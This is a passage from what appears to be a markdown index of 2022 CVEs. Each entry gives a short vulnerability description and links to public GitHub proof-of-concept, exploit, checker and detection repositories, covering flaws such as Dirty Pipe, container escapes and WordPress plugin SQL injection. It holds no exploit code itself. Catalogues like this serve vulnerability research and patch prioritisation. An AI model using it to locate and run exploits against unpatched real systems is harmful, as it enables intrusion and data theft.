The WP Import Export WordPress plugin (both free and premium versions) is vulnerable to unauthenticated sensitive data disclosure due to a missing capability check on the download function wpie_process_file_download found in the ~/includes/classes/class-wpie-general.php file. This made it possible for unauthenticated attackers to download any imported or exported information from a vulnerable site which can contain sensitive information like user data. This affects versions up to, and including, 3.9.15.

- [qurbat/CVE-2022-0236](https://github.com/qurbat/CVE-2022-0236)
- [xiska62314/CVE-2022-0236](https://github.com/xiska62314/CVE-2022-0236)

### CVE-2022-0265 (2022-03-03)

Improper Restriction of XML External Entity Reference in GitHub repository hazelcast/hazelcast in 5.1-BETA-1.

- [achuna33/CVE-2022-0265](https://github.com/achuna33/CVE-2022-0265)

### CVE-2022-0316 (2023-01-23)

The WeStand WordPress theme before 2.1, footysquare WordPress theme, aidreform WordPress theme, statfort WordPress theme, club-theme WordPress theme, kingclub-theme WordPress theme, spikes WordPress theme, spikes-black WordPress theme, soundblast WordPress theme, bolster WordPress theme from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.

- [KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit](https://github.com/KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit)

### CVE-2022-0332 (2022-01-25)

A flaw was found in Moodle in versions 3.11 to 3.11.4. An SQL injection risk was identified in the h5p activity web service responsible for fetching user attempt data.

- [numanturle/CVE-2022-0332](https://github.com/numanturle/CVE-2022-0332)

### CVE-2022-0337 (2023-01-02)

Inappropriate implementation in File System API in Google Chrome on Windows prior to 97.0.4692.71 allowed a remote attacker to obtain potentially sensitive information via a crafted HTML page. (Chrome security severity: High)

- [Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera](https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera)
- [maldev866/ChExp-CVE-2022-0337-](https://github.com/maldev866/ChExp-CVE-2022-0337-)
- [zer0ne1/CVE-2022-0337-RePoC](https://github.com/zer0ne1/CVE-2022-0337-RePoC)

### CVE-2022-0412 (2022-02-28)

The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks

- [TcherB31/CVE-2022-0412_Exploit](https://github.com/TcherB31/CVE-2022-0412_Exploit)

### CVE-2022-0435 (2022-03-25)

A stack overflow flaw was found in the Linux kernel's TIPC protocol functionality in the way a user sends a packet with malicious content where the number of domain member nodes is higher than the 64 allowed. This flaw allows a remote user to crash the system or possibly escalate their privileges if they have access to the TIPC network.

- [wlswotmd/CVE-2022-0435](https://github.com/wlswotmd/CVE-2022-0435)

### CVE-2022-0439 (2022-03-07)

The Email Subscribers & Newsletters WordPress plugin before 5.3.2 does not correctly escape the `order` and `orderby` parameters to the `ajax_fetch_report_list` action, making it vulnerable to blind SQL injection attacks by users with roles as low as Subscriber. Further, it does not have any CSRF protection in place for the action, allowing an attacker to trick any logged in user to perform the action by clicking a link.

- [RandomRobbieBF/CVE-2022-0439](https://github.com/RandomRobbieBF/CVE-2022-0439)

### CVE-2022-0441 (2022-03-07)

The MasterStudy LMS WordPress plugin before 2.7.6 does not validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin.

- [biulove0x/CVE-2022-0441](https://github.com/biulove0x/CVE-2022-0441)
- [SDragon1205/cve-2022-0441](https://github.com/SDragon1205/cve-2022-0441)
- [tegal1337/CVE-2022-0441](https://github.com/tegal1337/CVE-2022-0441)
- [kyukazamiqq/CVE-2022-0441](https://github.com/kyukazamiqq/CVE-2022-0441)

### CVE-2022-0482 (2022-03-09)

Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository alextselegidis/easyappointments prior to 1.4.3.

- [Acceis/exploit-CVE-2022-0482](https://github.com/Acceis/exploit-CVE-2022-0482)
- [mija-pilkaite/CVE-2022-0482_exploit](https://github.com/mija-pilkaite/CVE-2022-0482_exploit)

### CVE-2022-0486 (2022-05-17)

Improper file permissions in the CommandPost, Collector, Sensor, and Sandbox components of Fidelis Network and Deception enables an attacker with local, administrative access to the CLI to modify affected files and enable escalation of privileges equivalent to the root user. The vulnerability is present in Fidelis Network and Deception versions prior to 9.4.5. Patches and updates are available to address this vulnerability.

- [henryreed/CVE-2022-0486](https://github.com/henryreed/CVE-2022-0486)

### CVE-2022-0492 (2022-03-03)

A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.

- [PaloAltoNetworks/can-ctr-escape-cve-2022-0492](https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492)
- [SofianeHamlaoui/CVE-2022-0492-Checker](https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker)
- [chenaotian/CVE-2022-0492](https://github.com/chenaotian/CVE-2022-0492)
- [bb33bb/CVE-2022-0492](https://github.com/bb33bb/CVE-2022-0492)
- [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492)
- [yoeelingBin/CVE-2022-0492-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0492-Container-Escape)
- [T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC](https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC)

### CVE-2022-0529 (2022-02-09)

A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string and leads to a heap out-of-bounds write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.

- [nanaao/unzip_poc](https://github.com/nanaao/unzip_poc)
- [ByteHackr/unzip_poc](https://github.com/ByteHackr/unzip_poc)

### CVE-2022-0540 (2022-04-20)

A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.

- [Pear1y/CVE-2022-0540-RCE](https://github.com/Pear1y/CVE-2022-0540-RCE)

### CVE-2022-0543 (2022-02-18)

It was discovered that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.

- [0x7eTeam/CVE-2022-0543](https://github.com/0x7eTeam/CVE-2022-0543)
- [z92g/CVE-2022-0543](https://github.com/z92g/CVE-2022-0543)
- [JacobEbben/CVE-2022-0543](https://github.com/JacobEbben/CVE-2022-0543)
- [SiennaSkies/redisHack](https://github.com/SiennaSkies/redisHack)

### CVE-2022-0591 (2022-03-21)

The FormCraft WordPress plugin before 3.8.28 does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users

- [im-hanzou/FC3er](https://github.com/im-hanzou/FC3er)

### CVE-2022-0666 (2022-02-18)

CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11.

- [keyboardancer/CVE-2022-0666](https://github.com/keyboardancer/CVE-2022-0666)

### CVE-2022-0725 (2022-03-07)

A flaw was found in keepass. The vulnerability occurs due to logging the plain text passwords in system log and leads to an Information Exposure vulnerability. This flaw allows an attacker to interact and read sensitive passwords and logs.

- [ByteHackr/keepass_poc](https://github.com/ByteHackr/keepass_poc)

### CVE-2022-0739 (2022-03-21)

The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection

- [destr4ct/CVE-2022-0739](https://github.com/destr4ct/CVE-2022-0739)
- [Chris01s/CVE-2022-0739](https://github.com/Chris01s/CVE-2022-0739)
- [BKreisel/CVE-2022-0739](https://github.com/BKreisel/CVE-2022-0739)
- [hadrian3689/wp_bookingpress_1.0.11](https://github.com/hadrian3689/wp_bookingpress_1.0.11)
- [G01d3nW01f/CVE-2022-0739](https://github.com/G01d3nW01f/CVE-2022-0739)
- [viardant/CVE-2022-0739](https://github.com/viardant/CVE-2022-0739)
- [ElGanz0/CVE-2022-0739](https://github.com/ElGanz0/CVE-2022-0739)
- [lhamouche/Bash-exploit-for-CVE-2022-0739](https://github.com/lhamouche/Bash-exploit-for-CVE-2022-0739)

### CVE-2022-0778 (2022-03-15)

The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include:

- TLS clients consuming server certificates
- TLS servers consuming client certificates
- Hosting providers taking certificates or private keys from customers
- Certificate authorities parsing certification requests from subscribers
- Anything else which parses ASN.1 elliptic curve parameters

Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).

- [drago-96/CVE-2022-0778](https://github.com/drago-96/CVE-2022-0778)
- [yywing/cve-2022-0778](https://github.com/yywing/cve-2022-0778)
- [jkakavas/CVE-2022-0778-POC](https://github.com/jkakavas/CVE-2022-0778-POC)
- [0xUhaw/CVE-2022-0778](https://github.com/0xUhaw/CVE-2022-0778)
- [Trinadh465/openssl-1.1.1g_CVE-2022-0778](https://github.com/Trinadh465/openssl-1.1.1g_CVE-2022-0778)
- [jeongjunsoo/CVE-2022-0778](https://github.com/jeongjunsoo/CVE-2022-0778)
- [hshivhare67/OpenSSL_1.0.1g_CVE-2022-0778](https://github.com/hshivhare67/OpenSSL_1.0.1g_CVE-2022-0778)

### CVE-2022-0811 (2022-03-16)

A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed.

- [spiarh/webhook-cve-2022-0811](https://github.com/spiarh/webhook-cve-2022-0811)

### CVE-2022-0824 (2022-03-02)

Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.

- [faisalfs10x/Webmin-CVE-2022-0824-revshell](https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell)
- [honypot/CVE-2022-0824](https://github.com/honypot/CVE-2022-0824)
- [pizza-power/golang-webmin-CVE-2022-0824-revshell](https://github.com/pizza-power/golang-webmin-CVE-2022-0824-revshell)
- [gokul-ramesh/WebminRCE-exploit](https://github.com/gokul-ramesh/WebminRCE-exploit)

### CVE-2022-0847 (2022-03-07)

A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.

- [bbaranoff/CVE-2022-0847](https://github.com/bbaranoff/CVE-2022-0847)
- [xndpxs/CVE-2022-0847](https://github.com/xndpxs/CVE-2022-0847)
- [r1is/CVE-2022-0847](https://github.com/r1is/CVE-2022-0847)
- [Arinerron/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit)
- [2xYuan/CVE-2022-0847](https://github.com/2xYuan/CVE-2022-0847)
- [crowsec-edtech/Dirty-Pipe](https://github.com/crowsec-edtech/Dirty-Pipe)
- [lucksec/CVE-2022-0847](https://github.com/lucksec/CVE-2022-0847)
- [si1ent-le/CVE-2022-0847](https://github.com/si1ent-le/CVE-2022-0847)
- [bohr777/cve-2022-0847dirtypipe-exploit](https://github.com/bohr777/cve-2022-0847dirtypipe-exploit)
- [ZZ-SOCMAP/CVE-2022-0847](https://github.com/ZZ-SOCMAP/CVE-2022-0847)
- [cspshivam/CVE-2022-0847-dirty-pipe-exploit](https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit)
- [febinrev/dirtypipez-exploit](https://github.com/febinrev/dirtypipez-exploit)
- [ahrixia/CVE_2022_0847](https://github.com/ahrixia/CVE_2022_0847)
- [knqyf263/CVE-2022-0847](https://github.com/knqyf263/CVE-2022-0847)
- [puckiestyle/CVE-2022-0847](https://github.com/puckiestyle/CVE-2022-0847)
- [0xIronGoat/dirty-pipe](https://github.com/0xIronGoat/dirty-pipe)
- [ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit)
- [mrchucu1/CVE-2022-0847-Docker](https://github.com/mrchucu1/CVE-2022-0847-Docker)
- [basharkey/CVE-2022-0847-dirty-pipe-checker](https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker)
- [4luc4rdr5290/CVE-2022-0847](https://github.com/4luc4rdr5290/CVE-2022-0847)
- [dadhee/CVE-2022-0847_DirtyPipeExploit](https://github.com/dadhee/CVE-2022-0847_DirtyPipeExploit)
- [Greetdawn/CVE-2022-0847-DirtyPipe](https://github.com/Greetdawn/CVE-2022-0847-DirtyPipe)
- [Al1ex/CVE-2022-0847](https://github.com/Al1ex/CVE-2022-0847)
- [Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit)
- [nanaao/Dirtypipe-exploit](https://github.com/nanaao/Dirtypipe-exploit)
- [AyoubNajim/cve-2022-0847dirtypipe-exploit](https://github.com/AyoubNajim/cve-2022-0847dirtypipe-exploit)
- [pentestblogin/pentestblog-CVE-2022-0847](https://github.com/pentestblogin/pentestblog-CVE-2022-0847)
- [gyaansastra/CVE-2022-0847](https://github.com/gyaansastra/CVE-2022-0847)
- [DataDog/dirtypipe-container-breakout-poc](https://github.com/DataDog/dirtypipe-container-breakout-poc)
- [babyshen/CVE-2022-0847](https://github.com/babyshen/CVE-2022-0847)
- [edsonjt81/CVE-2022-0847-Linux](https://github.com/edsonjt81/CVE-2022-0847-Linux)
- [chenaotian/CVE-2022-0847](https://github.com/chenaotian/CVE-2022-0847)
- [V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit)
- [al4xs/CVE-2022-0847-Dirty-Pipe](https://github.com/al4xs/CVE-2022-0847-Dirty-Pipe)
- [Greetdawn/CVE-2022-0847-DirtyPipe-](https://github.com/Greetdawn/CVE-2022-0847-DirtyPipe-)
- [crusoe112/DirtyPipePython](https://github.com/crusoe112/DirtyPipePython)
- [nanaao/dirtyPipe-automaticRoot](https://github.com/nanaao/dirtyPipe-automaticRoot)
- [arttnba3/CVE-2022-0847](https://github.com/arttnba3/CVE-2022-0847)
- [AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits)
- [sa-infinity8888/Dirty-Pipe-CVE-2022-0847](https://github.com/sa-infinity8888/Dirty-Pipe-CVE-2022-0847)
- [realbatuhan/dirtypipetester](https://github.com/realbatuhan/dirtypipetester)
- [CYB3RK1D/CVE-2022-0847-POC](https://github.com/CYB3RK1D/CVE-2022-0847-POC)
- [breachnix/dirty-pipe-poc](https://github.com/breachnix/dirty-pipe-poc)
- [Shotokhan/cve_2022_0847_shellcode](https://github.com/Shotokhan/cve_2022_0847_shellcode)
- [githublihaha/DirtyPIPE-CVE-2022-0847](https://github.com/githublihaha/DirtyPIPE-CVE-2022-0847)
- [MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker](https://github.com/MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker)
- [jpts/CVE-2022-0847-DirtyPipe-Container-Breakout](https://github.com/jpts/CVE-2022-0847-DirtyPipe-Container-Breakout)
- [LudovicPatho/CVE-2022-0847_dirty-pipe](https://github.com/LudovicPatho/CVE-2022-0847_dirty-pipe)
- [DanaEpp/pwncat_dirtypipe](https://github.com/DanaEpp/pwncat_dirtypipe)
- [tmoneypenny/CVE-2022-0847](https://github.com/tmoneypenny/CVE-2022-0847)
- [scopion/dirty-pipe](https://github.com/scopion/dirty-pipe)
- [stfnw/Debugging_Dirty_Pipe_CVE-2022-0847](https://github.com/stfnw/Debugging_Dirty_Pipe_CVE-2022-0847)
- [drapl0n/dirtypipe](https://github.com/drapl0n/dirtypipe)
- [mhanief/dirtypipe](https://github.com/mhanief/dirtypipe)
- [tufanturhan/CVE-2022-0847-L-nux-PrivEsc](https://github.com/tufanturhan/CVE-2022-0847-L-nux-PrivEsc)
- [rexpository/linux-privilege-escalation](https://github.com/rexpository/linux-privilege-escalation)
- [CPT-Jack-A-Castle/CVE-2022-0847](https://github.com/CPT-Jack-A-Castle/CVE-2022-0847)
- [isaiahsimeone/COMP3320-VAPT](https://github.com/isaiahsimeone/COMP3320-VAPT)
- [VinuKalana/DirtyPipe-CVE-2022-0847](https://github.com/VinuKalana/DirtyPipe-CVE-2022-0847)
- [ih3na/debian11-dirty_pipe-patcher](https://github.com/ih3na/debian11-dirty_pipe-patcher)
- [greenhandatsjtu/CVE-2022-0847-Container-Escape](https://github.com/greenhandatsjtu/CVE-2022-0847-Container-Escape)
- [jxpsx/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/jxpsx/CVE-2022-0847-DirtyPipe-Exploits)
- [Asbatel/CBDS_CVE-2022-0847_POC](https://github.com/Asbatel/CBDS_CVE-2022-0847_POC)
- [airbus-cert/dirtypipe-ebpf_detection](https://github.com/airbus-cert/dirtypipe-ebpf_detection)
- [edr1412/Dirty-Pipe](https://github.com/edr1412/Dirty-Pipe)
- [eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits)
- [EagleTube/CVE-2022-0847](https://github.com/EagleTube/CVE-2022-0847)
- [yoeelingBin/CVE-2022-0847-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0847-Container-Escape)
- [notl0cal/dpipe](https://github.com/notl0cal/dpipe)
- [Gustavo-Nogueira/Dirty-Pipe-Exploits](https://github.com/Gustavo-Nogueira/Dirty-Pipe-Exploits)
- [b4dboy17/Dirty-Pipe-Oneshot](https://github.com/b4dboy17/Dirty-Pipe-Oneshot)
- [edsonjt81/CVE-2022-0847-DirtyPipe-](https://github.com/edsonjt81/CVE-2022-0847-DirtyPipe-)
- [Turzum/ps-lab-cve-2022-0847](https://github.com/Turzum/ps-lab-cve-2022-0847)
- [qwert419/linux-](https://github.com/qwert419/linux-)
- [DataFox/CVE-2022-0847](https://github.com/DataFox/CVE-2022-0847)
- [pmihsan/Dirty-Pipe-CVE-2022-0847](https://github.com/pmihsan/Dirty-Pipe-CVE-2022-0847)
- [ajith737/Dirty-Pipe-CVE-2022-0847-POCs](https://github.com/ajith737/Dirty-Pipe-CVE-2022-0847-POCs)
- [mutur4/CVE-2022-0847](https://github.com/mutur4/CVE-2022-0847)
- [orsuprasad/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/orsuprasad/CVE-2022-0847-DirtyPipe-Exploits)
- [JlSakuya/CVE-2022-0847-container-escape](https://github.com/JlSakuya/CVE-2022-0847-container-escape)
- [jonathanbest7/cve-2022-0847](https://github.com/jonathanbest7/cve-2022-0847)
- [0xeremus/dirty-pipe-poc](https://github.com/0xeremus/dirty-pipe-poc)
- [h4ckm310n/CVE-2022-0847-eBPF](https://github.com/h4ckm310n/CVE-2022-0847-eBPF)
- [joeymeech/CVE-2022-0847-Exploit-Implementation](https://github.com/joeymeech/CVE-2022-0847-Exploit-Implementation)
- [pashayogi/DirtyPipe](https://github.com/pashayogi/DirtyPipe)
- [n3rada/DirtyPipe](https://github.com/n3rada/DirtyPipe)
- [ayushx007/CVE-2022-0847-dirty-pipe-checker](https://github.com/ayushx007/CVE-2022-0847-dirty-pipe-checker)
- [ayushx007/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/ayushx007/CVE-2022-0847-DirtyPipe-Exploits)
- [solomon12354/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus](https://github.com/solomon12354/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus)
- [letsr00t/CVE-2022-0847](https://github.com/letsr00t/CVE-2022-0847)
- [xsxtw/CVE-2022-0847](https://github.com/xsxtw/CVE-2022-0847)
- [muhammad1596/CVE-2022-0847-dirty-pipe-checker](https://github.com/muhammad1596/CVE-2022-0847-dirty-pipe-checker)
- [muhammad1596/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/muhammad1596/CVE-2022-0847-DirtyPipe-Exploits)

### CVE-2022-0848 (2022-03-04)

OS Command Injection in GitHub repository part-db/part-db prior to 0.5.11.

- [dskmehra/CVE-2022-0848](https://github.com/dskmehra/CVE-2022-0848)
- [Lay0us/CVE-2022-0848-RCE](https://github.com/Lay0us/CVE-2022-0848-RCE)

### CVE-2022-0853 (2022-03-11)

A flaw was found in JBoss-client. The vulnerability occurs due to a memory leak on the JBoss client-side, when using UserTransaction repeatedly and leads to information leakage vulnerability.

- [ByteHackr/CVE-2022-0853](https://github.com/ByteHackr/CVE-2022-0853)

### CVE-2022-0918 (2022-03-16)

A vulnerability was discovered in the 389 Directory Server that allows an unauthenticated attacker with network access to the LDAP port to cause a denial of service. The denial of service is triggered by a single message sent over a TCP connection; no bind or other authentication is required. The message triggers a segmentation fault that results in slapd crashing.

- [NathanMulbrook/CVE-2022-0918](https://github.com/NathanMulbrook/CVE-2022-0918)

### CVE-2022-0944 (2022-03-15)

Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1.

- [shhrew/CVE-2022-0944](https://github.com/shhrew/CVE-2022-0944)
- [Philip-Otter/CVE-2022-0944_RCE_Automation](https://github.com/Philip-Otter/CVE-2022-0944_RCE_Automation)
- [FlojBoj/CVE-2022-0944](https://github.com/FlojBoj/CVE-2022-0944)
- [0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944](https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944)
- [Robocopsita/CVE-2022-0944_RCE_POC](https://github.com/Robocopsita/CVE-2022-0944_RCE_POC)
- [toneillcodes/CVE-2022-0944](https://github.com/toneillcodes/CVE-2022-0944)
- [TanveerS1ngh/SQLPad-6.10.0-Exploit-CVE-2022-0944](https://github.com/TanveerS1ngh/SQLPad-6.10.0-Exploit-CVE-2022-0944)

### CVE-2022-0952 (2022-05-02)

The Sitemap by click5 WordPress plugin before 1.0.36 does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.

- [RandomRobbieBF/CVE-2022-0952](https://github.com/RandomRobbieBF/CVE-2022-0952)

### CVE-2022-0995 (2022-03-25)

An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system.

- [Bonfee/CVE-2022-0995](https://github.com/Bonfee/CVE-2022-0995)
- [AndreevSemen/CVE-2022-0995](https://github.com/AndreevSemen/CVE-2022-0995)
- [1nzag/CVE-2022-0995](https://github.com/1nzag/CVE-2022-0995)

### CVE-2022-0997 (2022-05-17)

Improper file permissions in the CommandPost, Collector, and Sensor components of Fidelis Network and Deception enables an attacker with local, administrative access to the CLI to modify affected script files, which could result in arbitrary commands being run as root upon subsequent logon by a root user. The vulnerability is present in Fidelis Network and Deception versions prior to 9.4.5. Patches and updates are available to address this vulnerability.

- [henryreed/CVE-2022-0997](https://github.com/henryreed/CVE-2022-0997)

### CVE-2022-1011 (2022-03-18)

A use-after-free flaw was found in the Linux kernel’s FUSE filesystem in the way a user triggers write(). This flaw allows a local user to gain unauthorized access to data from the FUSE filesystem, resulting in privilege escalation.

- [xkaneiki/CVE-2022-1011](https://github.com/xkaneiki/CVE-2022-1011)

### CVE-2022-1012 (2022-08-05)

A memory leak problem was found in the TCP source port generation algorithm in net/ipv4/tcp.c due to the small table perturb size. This flaw may allow an attacker to leak information and may cause a denial of service problem.

- [nanopathi/Linux-4.19.72_CVE-2022-1012](https://github.com/nanopathi/Linux-4.19.72_CVE-2022-1012)

### CVE-2022-1015 (2022-04-29)

A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue.

- [pqlx/CVE-2022-1015](https://github.com/pqlx/CVE-2022-1015)
- [zanezhub/CVE-2022-1015-1016](https://github.com/zanezhub/CVE-2022-1015-1016)
- [shuttterman/bob_kern_exp1](https://github.com/shuttterman/bob_kern_exp1)
- [ysanatomic/CVE-2022-1015](https://github.com/ysanatomic/CVE-2022-1015)
- [wlswotmd/CVE-2022-1015](https://github.com/wlswotmd/CVE-2022-1015)
- [delsploit/CVE-2022-1015](https://github.com/delsploit/CVE-2022-1015)
- [pivik271/CVE-2022-1015](https://github.com/pivik271/CVE-2022-1015)
- [more-kohii/CVE-2022-1015](https://github.com/more-kohii/CVE-2022-1015)
- [0range1337/CVE-2022-1015](https://github.com/0range1337/CVE-2022-1015)
- [seadragnol/CVE-2022-1015](https://github.com/seadragnol/CVE-2022-1015)

### CVE-2022-1026 (2022-04-04)

Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function.

- [ac3lives/kyocera-cve-2022-1026](https://github.com/ac3lives/kyocera-cve-2022-1026)
- [flamebarke/nmap-printer-nse-scripts](https://github.com/flamebarke/nmap-printer-nse-scripts)
- [r0lh/kygocera](https://github.com/r0lh/kygocera)

### CVE-2022-1040 (2022-03-25)

An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.

- [killvxk/CVE-2022-1040](https://github.com/killvxk/CVE-2022-1040)
- [jam620/Sophos-Vulnerability](https://github.com/jam620/Sophos-Vulnerability)
- [Keith-amateur/cve-2022-1040](https://github.com/Keith-amateur/cve-2022-1040)
- [jackson5sec/CVE-2022-1040](https://github.com/jackson5sec/CVE-2022-1040)
- [michealadams30/CVE-2022-1040](https://github.com/michealadams30/CVE-2022-1040)
- [Cyb3rEnthusiast/CVE-2022-1040](https://github.com/Cyb3rEnthusiast/CVE-2022-1040)
- [xMr110/CVE-2022-1040](https://github.com/xMr110/CVE-2022-1040)

### CVE-2022-1051 (2022-05-16)

The WPQA Builder Plugin WordPress plugin before 5.2, used as a companion plugin for the Discy and Himer, does not sanitise and escape the city, phone or profile credentials fields when outputting them in the profile page, allowing any authenticated user to perform Cross-Site Scripting attacks.

- [V35HR4J/CVE-2022-1051](https://github.com/V35HR4J/CVE-2022-1051)

### CVE-2022-1068 (2022-04-01)

Modbus Tools Modbus Slave (versions 7.4.2 and prior) is vulnerable to a stack-based buffer overflow in the registration field. This may cause the program to crash when a long character string is used.

- [webraybtl/CVE-2022-1068](https://github.com/webraybtl/CVE-2022-1068)

### CVE-2022-1077 (2022-03-29)

A vulnerability was found in TEM FLEX-1080 and FLEX-1085 1.6.0. It has been declared as problematic. This vulnerability affects the file log.cgi of the component Log Handler. A direct request leads to information disclosure of hardware information. The attack can be initiated remotely and does not require any form of authentication.

- [brosck/CVE-2022-1077](https://github.com/brosck/CVE-2022-1077)

### CVE-2022-1096 (2022-07-22)

Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [Mav3r1ck0x1/Chrome-and-Edge-Version-Dumper](https://github.com/Mav3r1ck0x1/Chrome-and-Edge-Version-Dumper)

### CVE-2022-1119 (2022-04-19)

The Simple File List WordPress plugin is vulnerable to Arbitrary File Download via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls, which makes it possible for unauthenticated attackers to supply a path to a file that will subsequently be downloaded, in versions up to and including 3.2.7.

- [z92g/CVE-2022-1119](https://github.com/z92g/CVE-2022-1119)

### CVE-2022-1162 (2022-04-04)

A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2, allowing attackers to potentially take over accounts.

- [Greenwolf/CVE-2022-1162](https://github.com/Greenwolf/CVE-2022-1162)
- [ipsBruno/CVE-2022-1162](https://github.com/ipsBruno/CVE-2022-1162)

### CVE-2022-1175 (2022-04-04)

Improper neutralization of user input in GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 allowed an attacker to exploit XSS by injecting HTML in notes.

- [Greenwolf/CVE-2022-1175](https://github.com/Greenwolf/CVE-2022-1175)

### CVE-2022-1203 (2022-05-30)

